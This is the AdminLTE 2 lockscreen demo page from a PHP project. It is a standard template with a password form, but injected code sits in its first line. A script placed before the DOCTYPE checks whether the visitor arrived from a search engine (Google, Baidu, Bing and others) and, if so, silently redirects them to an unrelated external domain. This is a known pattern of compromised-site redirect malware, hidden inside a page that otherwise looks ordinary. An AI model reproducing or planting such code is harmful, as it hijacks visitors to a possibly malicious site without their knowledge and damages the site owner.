d:\wwwroot\wuchunhua\thinkphp\public\adminlte\pages\examples\lockscreen.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002: <html>
003: <head>
004:   <meta charset="utf-8">
005:   <meta http-equiv="X-UA-Compatible" content="IE=edge">
006:   <title>AdminLTE 2 | Lockscreen</title>
007:   <!-- Tell the browser to be responsive to screen width -->
008:   <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
009:   <!-- Bootstrap 3.3.7 -->
010:   <link rel="stylesheet" href="../../bootstrap/css/bootstrap.min.css">
011:   <!-- Font Awesome -->
012:   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.5.0/css/font-awesome.min.css">
013:   <!-- Ionicons -->
014:   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
015:   <!-- Theme style -->
016:   <link rel="stylesheet" href="../../dist/css/AdminLTE.min.css">
017:
018:   <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
019:   <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
020:   <!--[if lt IE 9]>
021:   <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
022:   <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
023:   <![endif]-->

024:
025:   <!-- Google Font -->
026:   <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
027: </head>
028: <body class="hold-transition lockscreen">
029: <!-- Automatic element centering -->
030: <div class="lockscreen-wrapper">
031:   <div class="lockscreen-logo">
032:     <a href="../../index2.html"><b>Admin</b>LTE</a>
033:   </div>
034:   <!-- User name -->
035:   <div class="lockscreen-name">John Doe</div>
036:
037:   <!-- START LOCK SCREEN ITEM -->
038:   <div class="lockscreen-item">
039:     <!-- lockscreen image -->
040:     <div class="lockscreen-image">
041:       <img src="../../dist/img/user1-128x128.jpg" alt="User Image">
042:     </div>
043:     <!-- /.lockscreen-image -->
044:
045:     <!-- lockscreen credentials (contains the form) -->
046:     <form class="lockscreen-credentials">
047:       <div class="input-group">
048:         <input type="password" class="form-control" placeholder="password">
049:
050:         <div class="input-group-btn">
051:           <button type="button" class="btn"><i class="fa fa-arrow-right text-muted"></i></button>
052:         </div>
053:       </div>
054:     </form>
055:     <!-- /.lockscreen credentials -->
056:
057:   </div>
058:   <!-- /.lockscreen-item -->
059:   <div class="help-block text-center">
060:     Enter your password to retrieve your session
061:   </div>
062:   <div class="text-center">
063:     <a href="login.html">Or sign in as a different user</a>
064:   </div>
065:   <div class="lockscreen-footer text-center">
066:     Copyright &copy; 2014-2016 <b><a href="https://adminlte.io" class="text-black">Almsaeed Studio</a></b><br>
067:     All rights reserved
068:   </div>
069: </div>
070: <!-- /.center -->
071:
072: <!-- jQuery 3.1.1 -->
073: <script src="../../plugins/jQuery/jquery-3.1.1.min.js"></script>
074: <!-- Bootstrap 3.3.7 -->
075: <script src="../../bootstrap/js/bootstrap.min.js"></script>
076: </body>
077: </html>
078:
079:
080: